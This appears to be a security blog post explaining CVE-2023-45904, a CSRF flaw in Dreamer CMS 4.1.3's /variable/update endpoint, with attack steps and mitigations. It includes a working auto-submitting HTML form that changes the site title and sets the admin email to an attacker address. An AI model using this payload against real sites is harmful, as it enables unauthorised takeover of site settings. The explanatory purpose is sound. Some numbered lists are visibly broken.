CVE-2023-45904 - How Dreamer CMS v4.1.3’s /variable/update CSRF Flaw Could Let Attackers Change Your Website Settings

Dreamer CMS is a popular, open-source Content Management System used to build websites. Security researchers have discovered multiple vulnerabilities in this platform, and one worth knowing about is CVE-2023-45904—a Cross-Site Request Forgery (CSRF) vulnerability affecting Dreamer CMS version 4.1.3. If you use Dreamer CMS or are just interested in web security, this post will explain what’s going on, what could happen, and how to defend yourself.

Vulnerability Type: Cross-Site Request Forgery (CSRF)

- Affected Component: /variable/update endpoint

Version Affected: Dreamer CMS v4.1.3

With this CSRF flaw, an attacker could trick an authenticated admin into executing unwanted actions, like changing website settings, without their knowledge.

Original Reference

- NVD Entry: CVE-2023-45904
- Exploit Database: 52432

What is CSRF and How Does It Work?

CSRF is an attack that tricks a logged-in user into submitting a web request they didn’t intend. If a user is logged into Dreamer CMS as an admin and visits a malicious page in another tab, that page could send requests on their behalf—without their permission.

Most modern applications prevent this with CSRF tokens, but Dreamer CMS v4.1.3 is missing those protections on /variable/update.

Admin logs in to Dreamer CMS and leaves the session active.

2. Attacker tricks admin into visiting a webpage containing malicious code (could be a clever link or image).
3. The malicious code sends a specially crafted request to /variable/update.
4. The server receives the request (coming from the admin’s browser), and performs the action as if it were the admin.

Exploit Example

Say the CMS website is hosted at http://victim.com/admin. An attacker wants to change a website setting to something malicious. They could set up a webpage with this HTML:

<html>
  <body>
    <form action="http://victim.com/admin/variable/update" method="POST" id="csrfForm">
      <input type="hidden" name="site_title" value="HACKED by Attacker">
      <input type="hidden" name="admin_email" value="evil@attacker.com">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

How it works

- Any admin who’s _still logged in_ and visits the attacker’s web page will automatically submit this form.

Check for CSRF Tokens: Only allow variable updates with a valid anti-CSRF token.

3. Restrict Origin & Referrer: Server-side checks to ensure requests only come from trusted sources.

Conclusion

CVE-2023-45904 is a serious security bug in Dreamer CMS 4.1.3. An attacker can trick admins into changing crucial website settings simply by making them visit a malicious web page. The fix is to update your CMS and make sure anti-CSRF measures are in place. If you’re running Dreamer CMS, check your version and patch up as soon as possible. Stay safe!

Further Reading

- OWASP: Cross-Site Request Forgery (CSRF)
- NVD CVE-2023-45904
- Exploit Database Entry

Have more questions? Drop a comment or share your experience. Stay patched!

Timeline

Published on: 10/17/2023 14:15:10 UTC
Last modified on: 10/18/2023 17:55:56 UTC